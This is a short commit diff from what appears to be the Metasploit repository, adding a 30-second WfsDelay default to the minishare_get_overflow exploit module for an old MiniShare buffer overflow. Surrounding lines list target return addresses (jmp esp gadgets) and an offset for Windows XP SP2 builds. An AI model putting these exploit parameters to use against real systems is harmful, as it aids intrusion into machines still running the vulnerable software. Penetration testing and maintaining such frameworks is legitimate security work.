Land #4974, minishare_get_overflow WfsDelay change
commit
07b82ec640
|
@ -53,6 +53,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
|
['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
|
||||||
['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
|
['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
|
||||||
],
|
],
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'WfsDelay' => 30
|
||||||
|
},
|
||||||
'DisclosureDate' => 'Nov 7 2004'))
|
'DisclosureDate' => 'Nov 7 2004'))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue